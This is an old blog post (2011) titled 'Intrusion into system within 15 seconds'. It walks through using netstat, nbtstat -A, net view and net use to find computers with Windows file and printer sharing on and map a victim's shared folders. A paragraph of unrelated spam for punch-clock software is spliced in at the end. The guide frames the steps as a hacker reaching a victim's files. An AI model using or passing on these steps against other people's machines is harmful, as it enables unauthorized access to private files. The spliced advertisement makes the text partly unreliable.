শনিবার, ২১ মে, ২০১১

Intrusion into system within 15 seconds


First connect to the internet.
Then click Start,
Then click Run,
Type command.com and then press ENTER,
Type netstat -n in the command window.

Then you find your IP adress.

That looks something like this.
207.175.1.1(The number will be different)

Once you have the IP address,write it down,
then close that window by clicking(ok) and
do the following.

click start,
go to run(click on run),
type 'command', then click ok.

Now type the following
nbtstat-A IP address
for example: nbtstat-A 207.175.1.1
(please note that you must type the A in capital letters.)
This will give you a read out that looks like this

     NetBIOS Remote Machine Name Table

Name          Type            Status
-------------------------------------------
J-1        <00> UNIQUE    Registered
WORK   <00> GROUP      Registered
J-1        <03> UNIQUE    Registered
J-1       <20> UNIQUE     Registered
WORK   <1E> GROUP      Registered
WORK   <1D> UNIQUE    Registered
__MSBROWSE__.<01>GROUP   Registered

The numbers in the<>are hex code values.
What we are interested in is the"Hex Code"
number of <20>.
If there have a hex code<20>,that's a good
thing.
A hex code of <20> means you have file and
printer sharing turned on.
I’ll show you now how that information can be
used to gain access to your system.
A potential hacker would do a scan on a range
of IP address for systems with “File and Printer
Sharing” turned on. Once they have encountered
a system with sharing turned on the next step
would be to find out what is being shared.
This is how:

Net view \\<insert ip_address here>
Our potential hacker would then get a response
that looks something like this.
        Shared resources at \\ip_address
     
        Sharename       Type        Comment
        MY DOCUMENTS               Disk
        TEMP                              Disk


The command was completed successfully.
This shows the hacker that his potential victim
has their My Documents Folder shared and their
Temp directory shared. For the hacker to then get
access to those folders his next command will be.

Net use x: \\<insert IP address here>\temp

If all goes well for the hacker, he/she will then
get a response of(The command was completed successfully.)
At this point the hacker now has access to the TEMP
directory of his victim.

Punchanywhere is a web time clock / punch clock software that allows employees to punch in and punch out in a simple and easy way. This attendance system software allows you to automatically calculate worked time of your employees. Logiciel pointeuse
http://PunchAnyWhere.com/punch/links-net.html

কোন মন্তব্য নেই:

একটি মন্তব্য পোস্ট করুন